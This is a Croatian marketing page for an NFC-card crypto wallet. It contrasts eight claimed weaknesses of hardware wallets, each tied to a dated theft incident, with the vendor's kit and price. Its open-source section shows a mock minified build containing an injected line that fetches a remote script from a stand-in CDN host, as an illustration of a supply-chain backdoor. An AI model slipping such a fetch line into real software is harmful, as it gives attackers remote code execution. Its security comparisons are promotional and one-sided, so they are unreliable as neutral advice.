8 rupa Otvoreni kod Popis Pitanja
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Kreiraj novčanikKreiraj
Hardverski novčanici · neocigledne rupe

Neocigledne rupe hardverskog novčanika

Kupujete uređaj da zatvorite rupe. S njim stižu nove: firmver, ažuriranja, pozadinska usluga, zaslon, kutija, račun kod prodavača. Osam detalja koje recenzije stavljaju u prednosti — i osam načina na koje su preko njih uzimali novac 2020–2026.

Stvarni slučajevi s datumima i iznosima Po dokumentaciji proizvođača Komplet provjeravamo po istom popisu
Cijena greškejavni slučajevi
2026Coldcard · slaba slučajnost u firmveru$100M+
2025Bybit · potpisnici su potpisali ono što nisu vidjeli$1.5B
2024Dark Skippy · seed curi kroz dva potpisaistraživanje
2023Ledger Connect Kit · stražnja vrata u biblioteci$600K
2021Lažna aplikacija novčanika u App Storeu17,1 BTC
2020Curenje baze klijenata Ledger · phishing godinama270 000 ljudi
Osam rupa

Svaki detalj koji recenzije hvale — posebna rupa

Hardverski novčanik zatvara jednu rupu: ključ više ne leži na telefonu s internetom. Ali uređaj nije prazan. Ima firmver, ažuriranja, program na računalu, zaslon, kutiju, prodavača s vašom adresom — i svaki detalj dodaje površinu napada koju ranije niste imali. Ispod je osam takvih detalja: što o njima pišu u recenzijama, kako su preko njih uzimali novac, kako zatvoriti rupu i postoji li taj detalj u našem kompletu.

Rupa 01

Firmver koji stvara vaš ključ

U recenzijama: „zaštićeni čip — ključ se stvara unutar uređaja i nikad ga ne napušta"

Ključ je ogromna slučajna brojka, a stvara ga firmver. Jedna greška u njemu — i ključeva je zapravo mnogo manje: prebiraju ih kod svih vlasnika odjednom, bez pristupa uređaju, godinama nakon kupnje. Čip tu nije bitan; rupa je iznad njega.

Slučaj
$100M+
Coldcard, srpanj 2026.: greška u buildu firmvera iz 2021. tiho je zamijenila hardverski generator slabim, zasijanim serijskim brojem uređaja i tajmerom. Snaga ključeva pala je na otprilike 40 bita; 5 000+ adresa je ispražnjeno.
Kako zatvoriti rupu
Možete li donijeti vlastitu slučajnost: bacanje kockica, vlastitu frazu. Novčanik koji prima entropiju od vas ne ovisi o jednoj grešci u firmveru.
Kod nas ovog detalja nema
Na kartici nema firmvera — to je šifrirani nosač. Ključ stvara Mitilena Air iz sustavnog generatora uređaja, a vi možete zadati vlastitu seed-frazu umjesto slučajnih riječi.
Rupa 02

Ažuriranja koja morate stavljati

U recenzijama: „proizvođač redovito izdaje sigurnosna ažuriranja“

Svako ažuriranje je trenutak kada se firmver može podmetnuti. Izmijenjeni firmver krije dijelove seed-a u dva-tri obična potpisa, a izvana uređaj radi kao i uvijek. Ni bez ažuriranja ne ide: rupe se zakrpavaju upravo ažuriranjima.

Slučaj
2 potpisa
Dark Skippy, kolovoz 2024.: istraživači su pokazali da zlonamjerni firmver hardverskog novčanika može iznijeti cijeli seed kroz dvije transakcije. Dovoljno je jednom ažurirati s pogrešnog mjesta.
Kako zatvoriti rupu
Odakle stiže firmver i provjerava li uređaj njegov potpis. Najbolje je kad uopće nema što ažurirati.
Kod nas ovog detalja nema
Na kartici nema što ažurirati ni podmetnuti. Potpisuje aplikacija na telefonu; njezine verzije su potpisane i stižu iz App Storea i Google Playja — kao svaka aplikacija koju sami vidite i zatvorite.
Rupa 03 · Osjetite apsurd
U recenzijama: „prikladna službena aplikacija za računalo“

Novčanik za nepovjerenje uz koji ide pozadinska usluga

Kupujete uređaj iz jednog razloga: da više ne vjerujete računalu. Da bi radio, na to isto računalo morate staviti pozadinsku uslugu. Niste je vi pisali, niste je pokrenuli i ne kontrolirate je: pokreće se sa sustavom, sluša port na koji može kucnuti bilo koji program na stroju, i nešto radi upravo sada — što točno, ne znate i nikad nećete provjeriti.

Radila je u pozadini i nakon što ste zatvorili novčanik. Godinama. Kod jednog od najvećih proizvođača to je bila posebna usluga-„most“; 2025. sakrili su je unutar same aplikacije — usluga je na mjestu, samo umire zajedno s prozorom. Kod većine ostalih bez programa na računalu uređaj je privezak. Na Linuxu dodajte udev pravila, inače sustav neće predati USB.

Znači stvar koju ste kupili da ne ovisite o programu na računalu ne radi bez programa na računalu. I to ne onoga koji vidite — onoga koji radi ispod njega.

Kod nas ovog detalja nema
Na računalo se ne instalira ništa: ni usluga, ni upravljački program, ni port. Posrednik je NFC-čip koji već stoji u vašem telefonu, napravio ga je njegov proizvođač i podređen je OS-u: radi samo kad je aplikacija otvorena i sami prislonite karticu, a telefon svaki put traži dozvolu. Kartica je pasivna: bez baterije, bez radija, sama ništa ne radi. Zatvorite aplikaciju — ne ostaje ništa što radi bez vas. Iskreno: aplikacija na telefonu treba, i ona je kao svaka druga — vidite je, pokrećete i zatvarate sami. U pomoćnoj prostoriji nitko ne živi.
Nadzor sustavaNOVČANIK ZATVOREN
ProcesStanjeRadi
HW Wallet Appnovčanik
zatvorili ste ga-
hwwalletdpozadinska usluga · most prema USB-u
radi412d 06:14
pokrenuta sustavom pri prijavine može se zatvoriti — to je usluga
Maketa; imena su uvjetna. Tako je izgledalo računalo s jednim od najpopularnijih USB-novčanika do 2025.; onda su „most“ ugradili u samu aplikaciju — usluga ista, samo više nije vidljiva na popisu.
Alegorija
Kuća radi privatnosti — i stanar u pomoćnoj prostoriji

Htjeli ste kuću radi privatnosti. Kupili ste je. Poslije je zatrebala zaštita — stavili ste. A da tarifa zaštite radi, zamolili su vas da u kuću pustite čovjeka u uniformi koji živi u pomoćnoj prostoriji non-stop, ima ključeve od svih vrata i ne javlja se vama. Niste ga zaposlili, ne možete ga otpustiti, a što radi noću — ne znate.

On je, naravno, „svoj“. Tako piše u ugovoru. Htjeli ste privatnost, a dobili ste surogat: kuću sa stanarom kojeg niste birali.

Rupa 04 · Otvoreni kod nije audit
U recenzijama: „otvoreni kod — svatko može provjerititi“

Otvoreni kod je način da programeri rade zajedno, a ne pečat da program ne krade

Otvoreni izvorni kod izmislili su da bi se programi dijelili i zajednički krpali. Kao alat za suradnju je odličan. Nikad nije bio pečat kvalitete „ovaj softver neće ukrasti vaš novac“, i evo zašto: vi ne koristite izvorni kod. Koristite ono što ste preuzeli.

Između GitHub repozitorija i datoteke na telefonu stoje build, trgovina aplikacija, ažuriranje, server. Na bilo kojem od tih koraka u kod može ući jedan red koji vuče bilo što od bilo kuda — a u repozitoriju ga neće biti. Ne možete usporediti svoju kopiju s izvornikom: trgovine daju kompajliranu datoteku; web-novčanik pri svakom otvaranju dobiva onaj kod koji je server danas odlučio vama poslati; proširenje preglednika noću se tiho ažurira.

„Otvoreno“ znači da neki ljudi mogu provjeriti neku verziju nekog dana. Što vaša kopija radi upravo sada — to ne znači.

U repozitoriju · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Kod vas na telefonu · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Jedan red u buildu. U repozitoriju ga nema, u trgovini se ne vidi, kod vas radi.
Otvorenost nije spriječila nijedan od ovih slučajeva
Ledger Connect Kit2023
otvorena biblioteka na GitHubu; zlonamjerna verzija objavljena je na npm; deseci stranica učitali su je uživo za nekoliko sati
Copay / event-stream2018
otvoreni novčanik; stražnja vrata donijela je ovisnost ciljana baš na njega
xz utils2024
otvoren dvadeset godina; backdoor je sjedio u releasima dok jedan inženjer slučajno nije primijetio da je SSH prijava sporija za pola sekunde
Coldcard2026
firmver s otvorenim kodom; greška u buildu pet godina zamjenjivala je hardverski generator slabim — ključevi prebirani bez pristupa uređaju, 5 000+ adresa, 100+ mil. $
Što stvarno radi
Ne čitanje tuđeg koda — dvije provjere koje svatko može napraviti. Prvo, audit ponašanja: stavite intercepting proxy na računalo, pustite aplikaciju kroz njega i gledajte što šalje gdje. Ne morate čitati kod — promet je potpuno vidljiv. Drugo, arhitektura u kojoj kod nema što ukrasti: ako ključ nikad ne sjedi na uređaju s mrežom, bilo koji red u bilo kojem ažuriranju je nemoćan — nema što poslati.
Kako to radimo
Prvo nudimo sami: pustite našu aplikaciju kroz proxy, web-verziju kroz DevTools preglednika, i pregledajte svaki zahtjev. Ključ potpisa i seed neće se pojaviti; jedini izuzetak je Monero view key — obrađen na stranici „kako odlazi prijenos“. Drugo je u kompletu: ključ se rađa u Mitilena Air na uređaju bez interneta, živi na kartici, a do online aplikacije stiže samo potpis — tamo proxyju nema što uhvatiti. I offline ovdje je stvaran: u air-gap načinu rada uređaj s ključem nije povezan ni na što — bez kabela, bez Bluetootha; transakcija ulazi i izlazi kao QR kod koji vidite očima. Ne „hladni“ novčanik na kabelu okačenom o online računalo s vlastitom uslugom koja razmjenjuje tko-zna-što.
Rupa 05

Zaslon na kojem se ne vidi što potpisujete

U recenzijama: „potvrdite na zaslonu uređaja — virus na računalu je nemoćan“

Zaslon je sićušan, i često pokazuje hash ili „poziv ugovora“, a ne adresu i iznos. Potvrđujete ono što ne vidite — a potpis je i dalje pošten, vaš. Zaslon daje osjećaj kontrole kojeg nema.

Slučaj
$1.5B
Bybit, veljača 2025.: potpisnici s hardverskim novčanicima potvrdili su prijenos koji je u sučelju izgledao obično. Uređaji su pokazivali podatke koje čovjek nije mogao provjeriti.
Kako zatvoriti rupu
Primatelj, iznos i tip operacije ljudskim jezikom — ne hash — i odbijanje jednim gumbom.
Kako to radimo
Zaslon postoji, ali to je zaslon telefona: adresa, iznos i tip zahtjeva riječima — prijenos, poziv ugovora, odobrenje — i gumb Odbij. Za velike iznose — poseban offline uređaj koji prima cijelu transakciju.
Rupa 06

Kutija u kojoj već leži seed

U recenzijama: „stiže u zapečaćenoj kutiji sa sigurnosnim pečatom“

Fizički uređaj znači dostavu, posrednike i „akcijske“ trgovine. Novčanik stiže već podešen, sa seed-om na listiću unutra. Ili slična aplikacija u trgovini traži da „unesete seed radi aktivacije“.

Slučaj
17,1 BTC
App Store, 2021.: vlasnik hardverskog novčanika unio je seed u sličnu aplikaciju i izgubio 17,1 BTC. Iste godine, nakon curenja baze, kupcima Ledgera slali su lažne uređaje uz pismo „premjestite seed na novi“.
Kako zatvoriti rupu
Inicijalizirajte sami i nikad ne koristite seed koji je stigao već ispisan. Pečat nije provjera; provjera je što ključ stvarate vi.
Kako to radimo
Kartice stižu prazne: ključ stvarate i upisujete sami — u kutiji ne može biti gotovog seed-a. Aplikacija stiže samo iz App Storea i Google Playja preko poveznica na stranici; seed traži samo pri uvozu i potpisivanju.
Rupa 07

Račun kod prodavača

U recenzijama: „službena garancija, podrška i lični račun“

Da kupite uređaj, proizvođaču date ime, e-mail i adresu dostave. Vaša sigurnost sada ovisi o njihovoj bazi. Ako procuri — godinama ćete dobivati poruke da „potvrdite seed na novom uređaju“, ponekad i s paketima.

Slučaj
270 000 ljudi
Ledger, 2020.: procurili su podaci o 270 000 kupaca, uključujući poštanske adrese. E-mailovi, pozivi i paketi sa zahtjevom da „premjestite“ seed traju do danas.
Kako zatvoriti rupu
Što manje znaju o vama, to je kraći vektor: kupnja bez računa, podrška koja nikad ne traži seed, i pravilo „samo lopov traži seed“.
Kod nas ovog detalja nema
Novčanik radi bez registracije — bez računa. Prodavač zna samo adresu dostave. Ni podrška ni aplikacija ne traže seed.
Rupa 08

Jedan uređaj i jedan listić papira

U recenzijama: „čvrsto kućište, veliki zaslon, baterija na tjedan dana“

Što više dijelova, to više kvarova: konektor, zaslon, baterija. Oporavak visi o jednom listiću sa seed-om — pokisao, izgubljen pri selidbi, uslikan „za svaki slučaj“. Najčešći uzrok gubitka nije hak.

Slučaj
≈20 % BTC
Chainalysis procjenjuje da je oko petine cijelog bitcoina zauvijek izgubljeno — uglavnom zbog izgubljenih ključeva, ne hakova.
Kako zatvoriti rupu
Koliko kopija ključa stiže u kutiji i u kojem obliku, što ako se uređaj izgubi, i ima li u njemu nešto što se može pokvariti.
Kod nas ovog detalja nema
Bez zaslona, baterije ili konektora — nema što se pokvariti. I ne jedna kopija: pet ogledala u kutiji — dvije NFC kartice i tri stealth naljepnice u vodootpornoj plastici, rok 10+ godina.
Popis provjera

Čega ne smije biti u novčaniku

Osam detalja za osam rupa. Popis vrijedi za bilo koji novčanik — hardverski, mobilni, preglednik. Označite što ima onaj koji birate — i naš.

01
Ključ koji stvara samo softverbez vaše slučajnosti — vaše fraze ili kockica
02
Ažuriranja tamo gdje živi ključsvako ažuriranje je šansa da se podmetne kod
03
Usluga, upravljački program ili port na računaluvidi rupu 03
04
Pečat „open source“ umjesto arhitektureključ sjedi tamo gdje tuđi kod može ga dohvatiti
05
Zaslon koji pokazuje hash umjesto adrese i iznosai bez gumba Odbij
06
Seed koji je stigao već ispisanu kutiji, u pismu, u „aplikaciji za aktivaciju“
07
Račun kod prodavačai podrška koja može tražiti seed
08
Jedna kopija i dijelovi koji se kvarezaslon, baterija, konektor, jedan listić papira
Po ovom popisu Ultimativni komplet nema nijedan od osam detalja. U kutiji: 2 NFC kartice i 3 stealth naljepnice, Mitilena Air (ključevi bez interneta) i Mitilena Keys (potpis bez interneta). Kartice stižu prazne: ključ stvarate i šifrirate vi — ne tvornički čip. Sadržaj i cijena →
Ultimativni · offline komplet

Ne tvornički „zaštićeni čip“ — nosač koji šifrirate vi

Kartice stižu prazne. Ključ stvarate u Mitilena Air na telefonu bez interneta i sami ga upišete. Potpis ide preko Mitilena Keys, također offline: transakcija putuje QR-om. Pet istih kopija u kutiji: 2 NFC kartice i 3 stealth naljepnice u vodootpornoj plastici. 18 mreža, 20.000+ novčića, uključujući USDT.

Na računalo se ne instalira ništa
Bez firmvera, ažuriranja, zaslona ili baterije
Transakcija na offline telefon — zvukom ili QR-om, bez kabela i USB-a
Radi s besplatnom Mitilena aplikacijom za telefon
Vodootporna plastika, rok 10+ godina
Dostava širom svijeta · mitilena-store.com
Mitilena NFC kartica
Ultimativni · offline generiranje i potpis
€369€439
2 NFC kartice · 3 stealth naljepnice · Mitilena Air · licenca Mitilena Keys
Kupi ultimativni · €369 Osnovni i Premium — pogledajte sve tarife
Pitanja

Što ljudi pitaju kad stignu dovdje

Hardverski novčanik prednosti i mane — ukratko?

Jedna velika prednost: ključ nije na telefonu s internetom. Mane su osam detalja iznad — svaki dodaje površinu napada. Dobar hardverski novčanik je onaj s manje detalja, ne s više.

Što ako je telefon kompromitiran?

S karticom na glavnom telefonu ključ se u trenutku potpisa pojavi u izoliranom okruženju — isti rizik kao kod bilo kojeg telefonskog novčanika, samo kraći. Za iznose koji plaše — drugi sloj: potpis na posebnom offline uređaju do kojeg transakcija stiže QR-om.

Što ako ukradu ili izgubite karticu?

Bez lozinke kartica i naljepnica su beskorisna plastika — ključ na njima je šifriran. Izgubljenu kopiju zamjenjuju ostale četiri: dvije kartice i tri naljepnice iz kutije su ogledala.

Treba li ažurirati firmver hardverskog novčanika?

Ako je proizvođač zatvorio rupu — da, i baš tada se firmver može podmetnuti: provjerite izvor i potpis. Nosač bez firmvera nema taj izbor — nema što ažurirati, nema što podmetnuti.

Čime se ovo razlikuje od USB-novčanika?

Manje posrednika: bez kabela, upravljačkog programa, pozadinske usluge ili programa na računalu. Jedan posrednik — NFC-čip vašeg telefona — i odgovara vama i OS-u, ne prodavaču novčanika.

Znači li otvoreni kod sigurno?

Znači da netko nekad može provjerititi. Vi ne koristite kod nego ono što ste preuzeli, i ne možete usporediti jedno s drugim. Sigurnost dolazi iz arhitekture gdje ključ nije tamo gdje tuđi kod može ga dohvatiti.

NFC kartice s offline generiranjem i potpisom

5 kopija ključa · Air · Keys · ili besplatni novčanik za 30 sekundi · Zašto je „hardverski hlad“ često laž →
Kupi ultimativni · €369 Kreiraj besplatni novčanik